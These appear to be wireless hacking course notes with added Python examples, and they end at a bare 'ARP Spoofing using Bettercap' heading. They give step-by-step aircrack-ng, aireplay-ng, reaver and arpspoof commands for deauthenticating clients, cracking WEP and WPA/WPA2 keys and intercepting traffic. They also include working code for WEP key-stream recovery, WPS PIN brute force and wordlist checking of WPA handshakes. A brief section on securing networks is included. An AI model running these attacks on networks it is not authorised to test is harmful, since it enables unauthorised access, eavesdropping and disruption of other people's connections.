Network Hacking

Intro

  1. Pre-connection attacks

  2. Gaining access

  3. Post-connection attacks

What is a MAC Address?

  • Media Access Control

    • 48-bit address burned into the network interface by the manufacturer

    • Physical (link-layer) address, unique per interface

    • First three octets (the OUI) identify the manufacturer

  • "Permanent" only in hardware: the address the operating system uses can be changed in software, which is all the commands below do

Why Change the MAC Address?

  • Increase anonymity

  • Impersonate other devices

  • Bypass filters (e.g. MAC address filtering on an access point)

Changing the MAC Address

ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:55
ifconfig wlan0 up
# Verify: the "ether" line of `ifconfig wlan0` should now show the new address.
# The change lasts until the interface is reset or the machine reboots.
# Pick a unicast address (first octet even); a NIC will not accept a multicast one.
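The bit rules behind a "good" spoofed MAC, as an added example that is not part of the original notes: bit 0 of the first octet marks multicast (never usable as an interface address) and bit 1 marks a locally administered address, which is what a made-up MAC should set so it cannot collide with a real vendor assignment. The helpers also show the OUI-preserving variant used against vendor-based filters and emit the iproute2 equivalent of the ifconfig commands above. All addresses are constructed for illustration.

```python
import random
import re
from typing import List, Optional

# Added example (not from the original notes): the bit rules behind a spoofed MAC.
# All addresses used here are constructed for illustration.
MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")


def parse_mac(mac: str) -> bytes:
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes; rejects anything malformed."""
    if not MAC_RE.match(mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    return bytes(int(octet, 16) for octet in mac.split(":"))


def format_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def is_multicast(mac: str) -> bool:
    # Bit 0 of the first octet set = group (multicast) address; a NIC will not take it as its own.
    return bool(parse_mac(mac)[0] & 0x01)


def is_locally_administered(mac: str) -> bool:
    # Bit 1 of the first octet set = locally administered, i.e. not handed out under a vendor OUI.
    return bool(parse_mac(mac)[0] & 0x02)


def oui(mac: str) -> str:
    """First three octets: the manufacturer prefix (OUI)."""
    return format_mac(parse_mac(mac)[:3])


def random_mac(keep_oui_of: Optional[str] = None, rng: Optional[random.Random] = None) -> str:
    """Generate a unicast MAC.

    keep_oui_of: copy the vendor prefix of an existing address so the spoofed device looks like the
    same make (useful against vendor-based filters); bits 0/1 are then whatever that OUI carries.
    Otherwise the address is flagged locally administered so it cannot collide with a vendor assignment.
    """
    rng = rng or random.SystemRandom()
    if keep_oui_of is not None:
        if is_multicast(keep_oui_of):
            raise ValueError("source address is multicast, cannot reuse its OUI")
        prefix = parse_mac(keep_oui_of)[:3]
    else:
        first = (rng.randrange(256) & ~0x01) | 0x02  # clear multicast bit, set locally-administered bit
        prefix = bytes([first, rng.randrange(256), rng.randrange(256)])
    tail = bytes(rng.randrange(256) for _ in range(3))
    return format_mac(prefix + tail)


def change_mac_commands(iface: str, new_mac: str) -> List[str]:
    """iproute2 equivalent of the ifconfig sequence above, as shell commands to run as root."""
    if is_multicast(new_mac):
        raise ValueError("refusing to set a multicast MAC as an interface address")
    return [
        f"ip link set dev {iface} down",
        f"ip link set dev {iface} address {new_mac}",
        f"ip link set dev {iface} up",
    ]


if __name__ == "__main__":
    spoofed = random_mac()
    print(spoofed, "locally administered:", is_locally_administered(spoofed))
    for cmd in change_mac_commands("wlan0", spoofed):
        print(cmd)
```

`random_mac()` uses the OS entropy source by default; pass a seeded `random.Random` only when you need reproducible addresses in a lab script.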

Wireless Modes

iwconfig                       # note the current mode of wlan0 (Managed)
ifconfig wlan0 down
airmon-ng check kill           # stops NetworkManager/wpa_supplicant, which would otherwise flip the card back to managed mode
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig                       # should now show Mode:Monitor
# Later commands use "mon0": that is the name airmon-ng gives the monitor interface when you run
# "airmon-ng start wlan0" instead (newer versions call it wlan0mon). With the steps above the
# interface keeps the name wlan0, so substitute accordingly.

Pre-Connection Attacks

Packet Sniffing

Using airodump-ng

  • Part of the aircrack-ng suite

  • Airodump-ng is a packet sniffer

  • Used to capture all 802.11 frames within range of the adapter

  • Displays detailed info about networks around us (BSSID, channel, encryption, ESSID)

  • Connected clients, their signal strength, the networks they probe for, etc.

airodump-ng [MonitorModeInterface]

WiFi Bands

  • Decides the frequency range that can be used

  • Determines the channels that can be used

  • Clients need to support the band used by the router to communicate with it.

  • Data can only be sniffed from a band if the wireless adapter used supports that band (many cheap adapters are 2.4 GHz only)

  • The most common WiFi bands are:

    • a - uses the 5 GHz band only

    • b, g - use the 2.4 GHz band only

    • n - uses both 2.4 and 5 GHz

    • ac - uses the 5 GHz band only (unlike n, it has no 2.4 GHz mode)

airodump-ng --band a mon0      # 5 GHz only (default is the 2.4 GHz b/g channels)
airodump-ng --band abg mon0    # hop across both bands; slower, as each channel gets less listening time

Targeted Packet Sniffing

airodump-ng --bssid F8:23:B2:B9:50:A8 --channel 2 --write test mon0
# Locks the adapter to the target's channel so no frames are missed while hopping.
# --write produces test-01.cap (raw capture), test-01.csv, test-01.kismet.csv, etc.

Deauthentication Attack

  • Disconnect any client from any network

    • Works on encrypted networks (WEP, WPA, & WPA2)

    • No need to know the network key

    • No need to connect to the network

    • Caveat: fails when the AP and client use Protected Management Frames (802.11w), which authenticate deauthentication frames; optional in WPA2, mandatory in WPA3

aireplay-ng --deauth [#DeauthPackets] -a [NetworkMac] -c [TargetMac] [Interface]
# #DeauthPackets = 0 sends deauths continuously; omit -c to deauth every client of the AP.
# The adapter must be on the target's channel (start airodump-ng --channel first).
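Picking targets for the targeted sniffing and deauthentication commands above, as an added example that is not part of the original notes: it parses the CSV that `airodump-ng --write` produces into access points and stations, lists the clients of a given AP strongest-signal first (the best deauth candidates), flags any WEP networks, and builds the matching airodump-ng/aireplay-ng command lines. `SAMPLE_CSV` is a constructed file in the layout airodump-ng writes; every address, name and count in it is made up.

```python
from typing import Dict, List, Tuple

# Added example, not from the original notes. SAMPLE_CSV is a constructed file in the layout
# airodump-ng writes to <prefix>-01.csv; every address, name and number in it is made up.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
F8:23:B2:B9:50:A8, 2024-03-01 10:00:01, 2024-03-01 10:05:40,  2,  54, WPA2, CCMP, PSK, -41,  310,    0,   0.  0.  0.  0,   7, HomeNet, 
00:11:22:33:44:55, 2024-03-01 10:00:03, 2024-03-01 10:05:41,  1,  54, WEP , WEP , , -62,  295, 1843,   0.  0.  0.  0,   9, OldRouter, 
66:77:88:99:AA:BB, 2024-03-01 10:00:09, 2024-03-01 10:05:39,  6,  54, WPA2, CCMP, PSK, -70,  280,    0,   0.  0.  0.  0,   0, , 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2024-03-01 10:00:15, 2024-03-01 10:05:40, -50,  412, F8:23:B2:B9:50:A8, HomeNet
AA:BB:CC:DD:EE:02, 2024-03-01 10:01:02, 2024-03-01 10:05:41, -66,   38, 00:11:22:33:44:55, 
AA:BB:CC:DD:EE:03, 2024-03-01 10:02:30, 2024-03-01 10:05:12, -80,    5, (not associated), CoffeeShop,HomeNet
"""


def _fields(line: str) -> List[str]:
    return [f.strip() for f in line.split(",")]


def parse_airodump_csv(text: str) -> Tuple[List[Dict], List[Dict]]:
    """Split the two tables of an airodump-ng CSV into access points and stations."""
    aps, stations = [], []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("BSSID,"):
            section = "ap"
            continue
        if line.startswith("Station MAC,"):
            section = "sta"
            continue
        f = _fields(line)
        if section == "ap" and len(f) >= 14:
            aps.append({
                "bssid": f[0], "channel": int(f[3]), "privacy": f[5], "cipher": f[6],
                "auth": f[7], "power": int(f[8]), "ivs": int(f[10]),
                # ID-length 0 with an empty ESSID means the network name is hidden
                "essid": f[13] or ("<hidden>" if f[12] == "0" else ""),
            })
        elif section == "sta" and len(f) >= 6:
            stations.append({
                "station": f[0], "power": int(f[3]), "packets": int(f[4]), "bssid": f[5],
                # probed ESSIDs are comma separated, so they spill over the remaining fields
                "probed": [p for p in f[6:] if p],
            })
    return aps, stations


def clients_of(stations: List[Dict], bssid: str) -> List[str]:
    """Associated client MACs of one AP, strongest signal first (best deauth candidates)."""
    assoc = [s for s in stations if s["bssid"].upper() == bssid.upper()]
    return [s["station"] for s in sorted(assoc, key=lambda s: s["power"], reverse=True)]


def wep_networks(aps: List[Dict]) -> List[Dict]:
    """APs still on WEP (the ones the WEP cracking section applies to), most captured IVs first."""
    return sorted((a for a in aps if "WEP" in a["privacy"]), key=lambda a: a["ivs"], reverse=True)


def targeted_sniff_cmd(ap: Dict, prefix: str, iface: str) -> str:
    return f"airodump-ng --bssid {ap['bssid']} --channel {ap['channel']} --write {prefix} {iface}"


def deauth_cmd(ap: Dict, client: str, iface: str, count: int = 4) -> str:
    return f"aireplay-ng --deauth {count} -a {ap['bssid']} -c {client} {iface}"


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for ap in aps:
        print(f"{ap['bssid']} ch{ap['channel']:>2} {ap['privacy']:<5} {ap['essid']:<10} "
              f"clients={clients_of(stations, ap['bssid'])}")
    target = aps[0]
    print(targeted_sniff_cmd(target, "test", "mon0"))
    for client in clients_of(stations, target["bssid"]):
        print(deauth_cmd(target, client, "mon0"))
```

Read a real capture with `parse_airodump_csv(open("test-01.csv").read())`; the parser tolerates the padded columns and the trailing comma airodump-ng leaves on every row.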

Gaining Access - WEP Cracking

Theory Behind Cracking WEP Encryption

  • Wired Equivalent Privacy

  • Old encryption

  • Uses the RC4 stream cipher with a 40-bit or 104-bit key

  • Still used in some networks

  • Can be cracked easily

WEP Cracking

  • Client encrypts data using a key

  • Encrypted packet sent in the air

  • Router decrypts packet using the key

  • Each packet is encrypted using a unique key stream

  • A random initialization vector (IV) is used to generate the key streams

  • The IV is only 24 bits

  • RC4(IV + Key (Password)) = key stream; the packet (plus its CRC-32 integrity check) is XORed with it

  • IV is too small (only 24 bits, about 16.7 million values)

  • IV is sent in plain text in front of every packet

Result:

  • IVs will repeat on busy networks (a 50% chance of a repeat after roughly 5,000 packets, and a guaranteed repeat after 16.7 million)

  • Two packets encrypted with the same IV share a key stream: XORing them cancels the key stream and leaves the XOR of the two plaintexts, and any known plaintext reveals the key stream for that IV

  • This makes WEP vulnerable to statistical attacks (FMS/KoreK, and the PTW attack aircrack-ng uses by default) that recover the key itself from tens of thousands of captured IVs

  • and so break the encryption
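The IV reuse problem in working code, as an added example that is not part of the original notes: a toy WEP encryptor with real RC4, the real 24-bit IV layout and the real CRC-32 ICV, used to show that two frames under the same IV cancel to the XOR of their plaintexts, that one known plaintext (frames we inject ourselves are fully known) yields the key stream that decrypts the other frame without the key, and how quickly a random 24-bit IV repeats. The key is the example value the notes show in aircrack-ng's output further down; the packets are constructed.

```python
import math
import random
import struct
import zlib
from typing import Optional, Tuple

# Added example, not from the original notes: toy WEP (real RC4, real CRC-32 ICV, real 24-bit IV
# layout) used to show why a repeated IV is fatal. Key and packets are constructed.

LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")  # first 8 bytes of almost every WEP data frame carrying IP


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4: key schedule, then n bytes of key stream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32, little endian, appended before encryption."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV(3) | key id(1) | RC4(IV || key) XOR (plaintext || ICV)."""
    assert len(iv) == 3 and len(key) in (5, 13)
    body = plaintext + icv(plaintext)
    return iv + b"\x00" + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> Optional[bytes]:
    """Returns the plaintext, or None if the ICV does not match (wrong key or tampered frame)."""
    iv, body = frame[:3], frame[4:]
    plain = xor(body, rc4_keystream(iv + key, len(body)))
    data, tag = plain[:-4], plain[-4:]
    return data if tag == icv(data) else None


def keystream_from_known_plaintext(frame: bytes, known: bytes) -> Tuple[bytes, bytes]:
    """Ciphertext XOR known plaintext = key stream for that IV (no key needed)."""
    return frame[:3], xor(frame[4:4 + len(known)], known)


def decrypt_prefix_with_reused_iv(frame: bytes, iv: bytes, keystream: bytes) -> bytes:
    """Any other frame carrying the same IV is encrypted with the same key stream."""
    if frame[:3] != iv:
        raise ValueError("different IV, key stream does not apply")
    return xor(frame[4:4 + len(keystream)], keystream)


def packets_until_iv_repeat(seed: int = 0) -> int:
    """Simulate random IV selection and count packets until one repeats (birthday bound)."""
    rng = random.Random(seed)
    seen = set()
    count = 0
    while True:
        iv = rng.getrandbits(24)
        count += 1
        if iv in seen:
            return count
        seen.add(iv)


def expected_packets_until_repeat(bits: int = 24) -> float:
    return math.sqrt(math.pi / 2 * 2 ** bits)  # about 5133 for 24-bit IVs


if __name__ == "__main__":
    key = bytes.fromhex("4173323370")          # 40-bit key that aircrack-ng would print as 41:73:32:33:70
    iv = b"\x01\x02\x03"
    p1 = LLC_SNAP_IP + b"\x45\x00\x00\x28GET /login HTTP/1.1"           # a frame we caused, so fully known
    p2 = LLC_SNAP_IP + b"\x45\x00\x00\x3cPOST /login user=bob&pw=hunter2"  # someone else's frame, same IV
    c1, c2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    print(xor(c1[4:], c2[4:])[:len(p1)] == xor(p1, p2))               # key stream cancels out
    _, ks = keystream_from_known_plaintext(c1, p1 + icv(p1))
    print(decrypt_prefix_with_reused_iv(c2, iv, ks))                 # p2 recovered without the key
    print(packets_until_iv_repeat(), expected_packets_until_repeat())
```

The simulated repeat count is the best case for the defender (truly random IVs); many WEP cards used a counter starting at zero after every reset, so collisions between two such devices came far sooner.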

WEP Cracking Basics

Conclusion:

  • To crack WEP we need to:

    1. capture a large number of packets/IVs - using airodump-ng

    2. Analyse the captured IVs and crack the key - using aircrack-ng

airodump-ng --bssid 00:11:22:33:44:55 --channel 1 --write basic_wep mon0
aircrack-ng basic_wep-01.cap
# aircrack-ng can run while airodump-ng is still capturing; it re-reads the file as it grows.
# On success it prints e.g. "KEY FOUND! [ 41:73:32:33:70 ]" (your key will differ).
# Connect to the network using the hex key without the colons, e.g. 4173323370
# (5 bytes = 40-bit WEP, 13 bytes = 104-bit WEP).

Fake Authentication Attack

Problem:

  • If network is not busy

  • It would take some time to capture enough IVs

Solution:

  • Force the AP to generate new IVs

Problem:

  • APs only communicate with connected clients.

    • We can't communicate with it

    • We can't even start the attack

Solution:

  • Associate with the AP before launching the attack (fake authentication: WEP's open-system authentication lets us authenticate and associate without knowing the key)

airodump-ng --bssid 00:11:22:33:44:55 --channel 6 --write arpreplay mon0
aireplay-ng --fakeauth 0 -a [targetAPMac] -h [MyMac] mon0
# -h is the MAC of our own wireless adapter. In monitor mode ifconfig shows it on the "unspec" line;
# take the first six octets (e.g. 00-11-22-33-44-55-00-00-... -> 00:11:22:33:44:55).
# --fakeauth 0 authenticates once; a non-zero value re-authenticates every N seconds.
# A successful fake auth shows our MAC under STATION for that BSSID in airodump-ng.

ARP Request Replay Attack

  • Wait for an ARP packet

  • Capture it, and replay it (retransmit it)

  • This causes the AP to produce another packet with a new IV

  • Keep doing this till we have enough IVs to crack the key

# Even though they are encrypted, ARP packets can be recognised by their fixed size, which is how aireplay-ng picks them out.
airodump-ng --bssid 00:11:22:33:44:55 --channel 6 --write arpreplay mon0
aireplay-ng --fakeauth 0 -a [targetAPMac] -h [MyMac] mon0
aireplay-ng --arpreplay -b [targetAPMac] -h [MyMac] mon0
# If the AP de-associates us while arpreplay is running, repeat the fake authentication in another terminal:
aireplay-ng --fakeauth 0 -a [targetAPMac] -h [MyMac] mon0
# Once the #Data column in airodump-ng reaches a few tens of thousands:
aircrack-ng arpreplay-01.cap

Gaining Access - WPA/WPA2 Cracking

Intro

  • Both can be cracked using the same methods

  • Made to address the issues in WEP

  • Much more secure

  • Each packet is encrypted using a unique temporary key (WPA uses TKIP, WPA2 uses AES-CCMP)

  • Captured data packets contain nothing that helps recover the key

  • WPS is a feature that can be used with WPA & WPA2

  • Allows a client to connect without the password

  • Authentication is done using an 8 digit pin

    • 8 digits is a very small space, and the protocol checks the PIN in two halves (the last digit is a checksum), so at most 10,000 + 1,000 guesses are needed

    • We can try all possible pins in relatively short time

    • Once the correct PIN is accepted, the AP sends the actual WPA/WPA2 password as part of the WPS exchange, so the password itself never has to be cracked

  • PS. this only works if the router accepts PIN-based WPS (an external registrar) rather than only Push Button Configuration (PBC), and many routers lock WPS after a number of failed PINs
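The PIN arithmetic behind the "relatively short time", as an added example that is not part of the original notes: the checksum digit every WPS PIN carries, and the split brute force reaver performs against a simulated access point (a stand-in class with a made-up PIN; it mimics the protocol's leak, where the AP rejects M4 when the first four digits are wrong and M6 when the second half is wrong, and optionally the lockout real routers apply).

```python
from typing import Tuple

# Added example, not from the original notes: the WPS PIN checksum and the split brute force
# that reaver performs. SimulatedPinAP stands in for a real AP and uses a made-up PIN.


def wps_checksum(first_seven: int) -> int:
    """Checksum digit for a 7-digit PIN body (the algorithm reaver and APs use)."""
    accum = 0
    pin = first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


class SimulatedPinAP:
    """Stands in for an AP's WPS registrar exchange (messages M1..M8).

    The protocol proves the PIN in two halves: the AP answers M4 with an error (EAP-NACK) if the
    first four digits are wrong, and M6 with an error if the last four are wrong. That leak is the
    whole weakness; nothing about the WPA key is needed to observe it.
    """

    def __init__(self, pin: str, lock_after: int = 0):
        assert is_valid_wps_pin(pin)
        self._pin = pin
        self.attempts = 0
        self.lock_after = lock_after  # real APs often lock WPS after N failures; 0 = never (the weak setting)

    def _count(self) -> None:
        self.attempts += 1
        if self.lock_after and self.attempts > self.lock_after:
            raise RuntimeError("AP locked WPS (wash would now show Lck: Yes)")

    def m4_first_half_ok(self, first_half: str) -> bool:
        self._count()
        return first_half == self._pin[:4]

    def m6_second_half_ok(self, first_half: str, second_half: str) -> bool:
        self._count()
        return first_half == self._pin[:4] and second_half == self._pin[4:]


def search_space(split_halves: bool = True, use_checksum: bool = True) -> int:
    """Worst-case number of PINs an attacker must try."""
    if not split_halves:
        return 10 ** 7 if use_checksum else 10 ** 8
    return 10 ** 4 + (10 ** 3 if use_checksum else 10 ** 4)


def brute_force_pin(ap: SimulatedPinAP) -> Tuple[str, int]:
    """Recover the PIN the way reaver does: first half, then second half with the checksum derived."""
    first = next(f"{i:04d}" for i in range(10 ** 4) if ap.m4_first_half_ok(f"{i:04d}"))
    for j in range(10 ** 3):
        body = int(first + f"{j:03d}")
        second = f"{j:03d}{wps_checksum(body)}"
        if ap.m6_second_half_ok(first, second):
            return first + second, ap.attempts
    raise RuntimeError("no PIN found; AP does not use the standard checksum")


if __name__ == "__main__":
    ap = SimulatedPinAP("12345670")
    pin, tries = brute_force_pin(ap)
    print(pin, "after", tries, "attempts; worst case", search_space(), "instead of", search_space(split_halves=False))
```

Against a router with lockout enabled the same loop raises after `lock_after` attempts, which is why `wash` reports the lock state before you start reaver.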

Hacking WPA & WPA2 Without a Wordlist

# Discover WPS-enabled networks (the Lck column shows whether WPS is locked)
wash --interface mon0

# Run reaver (--no-associate: reaver does not associate itself; we keep the association alive with aireplay-ng below)
reaver --bssid 00:11:22:33:44:55 --channel 1 --interface mon0 -vvv --no-associate

# In a second terminal, keep our adapter associated with the AP while reaver runs (re-auth every 30 s)
aireplay-ng --fakeauth 30 -a [targetRouterMAC] -h [myMACAddress] mon0

Capturing the Handshake

  • WPA fixed the weaknesses in WEP

  • Packets contain no useful data

  • Only packets that can aid with the cracking process are the handshake packets

    • These are the 4 EAPOL packets (the 4-way handshake) exchanged when a client connects to the network

    • aircrack-ng needs at least the first two of them, captured on the AP's channel

# Run airodump as usual to get the BSSID and channel
# Then run airodump again, locked to that network
airodump-ng --bssid 00:11:22:33:44:55 --channel 1 --write wpa_handshake mon0
# Wait for a device to connect, or deauth a connected client so it reconnects;
# airodump-ng prints "WPA handshake: <BSSID>" in its top-right corner once captured
aireplay-ng --deauth 4 -a 00:11:22:33:44:55 -c [clientsMACAddress] mon0

Creating a Wordlist

  • The handshake does not contain data that helps recover the key

  • It contains data (the two MACs, the two nonces and a MIC) that can be used to check if a candidate key is valid or not

  • So the cracking is offline: each word is hashed and checked against the capture, with no further traffic to the target

crunch can be used to create a wordlist (e.g. every combination of a character set between two lengths, or a pattern given with -t)

Cracking WPA & WPA2 Using a Wordlist Attack

aircrack-ng wpa_handshake-01.cap -w test.txt
# -w is the wordlist. Speed is bounded by PBKDF2 (4096 HMAC-SHA1 rounds per candidate),
# so for large lists convert the capture and use a GPU cracker such as hashcat.
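What `aircrack-ng -w` does for every word, as an added example that is not part of the original notes and also serving the wordlist section above: it derives the PMK from the candidate passphrase and the SSID (PBKDF2), expands it to the PTK with the two MACs and two nonces, recomputes the MIC over the captured EAPOL frame and compares. The handshake is synthetic (constructed MACs, nonces and a made-up passphrase), built with the same functions so the check is exact; `mangle` is a small rule-based generator standing in for crunch.

```python
import hashlib
import hmac
import struct
from typing import Dict, Iterable, Iterator, Optional

# Added example, not from the original notes: the per-word check behind aircrack-ng -w, run
# against a synthetic 4-way handshake. All MACs, nonces and the passphrase are constructed.

MIC_OFFSET = 81  # EAPOL hdr (4) + descriptor type (1) + key info (2) + key len (2) + replay ctr (8)
                 # + nonce (32) + IV (16) + RSC (8) + ID (8) -> the 16-byte Key MIC field


def pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key: PBKDF2-HMAC-SHA1 of the passphrase salted with the SSID (the slow step)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk_: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512 over the sorted MACs and nonces; the first 16 bytes are the KCK used for the MIC."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk_, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the frame with its MIC field zeroed, cut to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_m2(snonce: bytes, key_data: bytes) -> bytes:
    """Message 2 of the handshake (client -> AP) with an all-zero MIC field."""
    body = (bytes([2])                                   # descriptor type: RSN
            + struct.pack(">H", 0x010A)                  # key info: MIC set, pairwise, HMAC-SHA1/AES
            + struct.pack(">H", 16)                      # key length
            + struct.pack(">Q", 1)                       # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + b"\x00" * 16                               # MIC, filled in by the client
            + struct.pack(">H", len(key_data)) + key_data)
    return bytes([2, 3]) + struct.pack(">H", len(body)) + body  # EAPOL v2, type 3 = EAPOL-Key


def make_handshake(passphrase: str, ssid: str, ap_mac: bytes, client_mac: bytes,
                   anonce: bytes, snonce: bytes) -> Dict:
    """What a capture gives us: SSID, both MACs, both nonces and an EAPOL frame carrying a MIC."""
    m2 = build_m2(snonce, bytes.fromhex("30140100000fac040100000fac040100000fac020000"))  # RSN IE
    kck = ptk(pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    m2 = m2[:MIC_OFFSET] + eapol_mic(kck, m2) + m2[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce, "eapol": m2}


def candidate_matches(hs: Dict, candidate: str) -> bool:
    """The check done per wordlist entry: derive the KCK, recompute the MIC, compare with the captured one."""
    if not 8 <= len(candidate) <= 63:
        return False  # WPA passphrases are 8-63 characters; skip rather than waste a PBKDF2
    kck = ptk(pmk(candidate, hs["ssid"]), hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16])


def mangle(base_words: Iterable[str], years: Iterable[int] = range(2015, 2025)) -> Iterator[str]:
    """Cheap wordlist generator: the kind of rules a crunch -t pattern or hashcat rule file expresses."""
    seen = set()
    for w in base_words:
        for f in (w, w.capitalize(), w.upper(), w.replace("a", "@").replace("o", "0")):
            for cand in [f, f + "123", f + "!", *(f + str(y) for y in years), *(f + str(y) + "!" for y in years)]:
                if cand not in seen:
                    seen.add(cand)
                    yield cand


def crack(hs: Dict, wordlist: Iterable[str]) -> Optional[str]:
    return next((w for w in wordlist if candidate_matches(hs, w)), None)


if __name__ == "__main__":
    hs = make_handshake("Summer2019!", "HomeNet", bytes.fromhex("f823b2b950a8"),
                        bytes.fromhex("aabbccddee01"), bytes(range(32)), bytes(range(32, 64)))
    print(crack(hs, mangle(["summer", "winter"])))
```

Each `candidate_matches` call costs one PBKDF2 (4096 HMAC rounds), which is the whole reason wordlist quality matters more than raw speed: the passphrase is found only if some rule produces it.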

Gaining Access - Security

Securing Your Network From Hackers

Now that we know how to test the security of all the common wireless encryptions (WEP/WPA/WPA2), securing our networks against these attacks is relatively easy, because we know the weaknesses attackers use to crack them.

So let's look at each of these encryptions one by one:

  1. WEP: WEP is an old encryption and it is really weak. As we saw, there are a number of methods that can crack it regardless of the strength of the password, and even when nobody is connected to the network. These attacks are possible because of the way WEP works (a short, plaintext IV reused with the same key), and some of them recover the key in a few minutes.

  2. WPA/WPA2: WPA and WPA2 are very similar; the main difference is the cipher used to protect the data (TKIP for WPA, AES-CCMP for WPA2), but both use the same handshake and are attacked in the same way. WPA/WPA2 can be cracked in two ways:

    1. If the WPS feature is enabled there is a high chance of obtaining the key regardless of its complexity, by exploiting a weakness in WPS. WPS lets users connect without entering the key, either by pressing a button on both the router and the device or by entering an eight-digit PIN. Attackers can brute force this PIN in a relatively short time (on average around 10 hours), and once the router accepts the right PIN it hands over the WPA/WPA2 key as part of the WPS exchange; reaver automates both steps. This works because the PIN is so small (only 8 digits, checked in two halves), so it is not a weakness in WPA/WPA2 itself but in an optional feature of routers that use WPA/WPA2, which can be exploited to get the actual WPA/WPA2 key.

    2. If WPS is not enabled, then the only practical way to crack WPA/WPA2 is a dictionary attack: a list of passwords (dictionary) is checked against the captured handshake file to see whether any of them is the network key. If the password is not in the wordlist the attacker will not find it, so a long random passphrase is out of reach.

Conclusion:

  1. Do not use WEP encryption; we have seen how easy it is to crack regardless of the complexity of the password, even when nobody is connected to the network.

  2. Use WPA2 (or WPA3 where your clients support it) with a long, complex passphrase that mixes lower-case letters, capital letters, symbols and numbers; and

  3. Ensure that WPS is disabled, as it can be used to recover even a complex WPA2 key by brute-forcing the short WPS PIN.

Post Connection Attacks - Information Gathering

  • Discover all devices on the network

  • Display their

    • IP Address

    • MAC Address

    • OS

    • Open ports

    • Running services

    • Etc.

netdiscover -r 10.0.2.0/24
# ARP scan of the whole subnet: fast and works on any host that answers ARP, but only yields IP, MAC and vendor

Network Mapping

  • Nmap: a very comprehensive network scanner

  • From an IP/IP range it can discover

    • Open ports

    • Running services

    • Operating system

    • Connected clients

    • Etc.

# You can also use the tool Zenmap (nmap's GUI); the three lines below are its Intense, Quick and Quick plus profiles
nmap -T4 -A -v 192.168.1.0/24                       # -A = OS detection, version detection, default scripts and traceroute
nmap -T4 -F 192.168.1.0/24                          # -F = only the 100 most common ports
nmap -sV -T4 -O -F --version-light 192.168.1.0/24   # light version probing plus OS detection on the common ports
# -T4 is aggressive timing; -A and -O need root because they send raw packets.

Post Connection Attacks - MiTM

ARP Poisoning

  • Address Resolution Protocol

  • Simple protocol used to map the IP address of a machine to its MAC address

Why ARP spoofing is possible

  1. Clients accept responses even if they did not send a request

  2. Clients trust responses without any form of verification

Intercepting Network Traffic

Arpspoof

  • arpspoof tool to run ARP spoofing attacks (part of the dsniff package)

  • Simple and reliable

  • Ported to most operating systems including Android and iOS

  • Usage is always the same

Usage:

  • arpspoof -i [interface] -t [clientIP] [gatewayIP]   (tell the client that we are the gateway)

  • arpspoof -i [interface] -t [gatewayIP] [clientIP]   (tell the gateway that we are the client)

  • Run both at the same time (two terminals) so traffic in both directions passes through us

# Enable IP forwarding first, otherwise the target loses connectivity as soon as its traffic reaches us
echo 1 > /proc/sys/net/ipv4/ip_forward

Bettercap Basics

  • Framework to run network attacks

  • Can be used to

    • ARP Spoof targets (redirect the flow of packets)

    • Sniff data (URLs, usernames, passwords)

    • Bypass HTTPS

    • Redirect domain requests (DNS spoofing)

    • Inject code into loaded pages

    • And more

  • usage: bettercap -iface [interface]

net.probe on     # actively probes every address on the subnet so hosts appear in the table
net.show         # lists discovered hosts with IP, MAC, vendor and hostname

ARP Spoofing using Bettercap
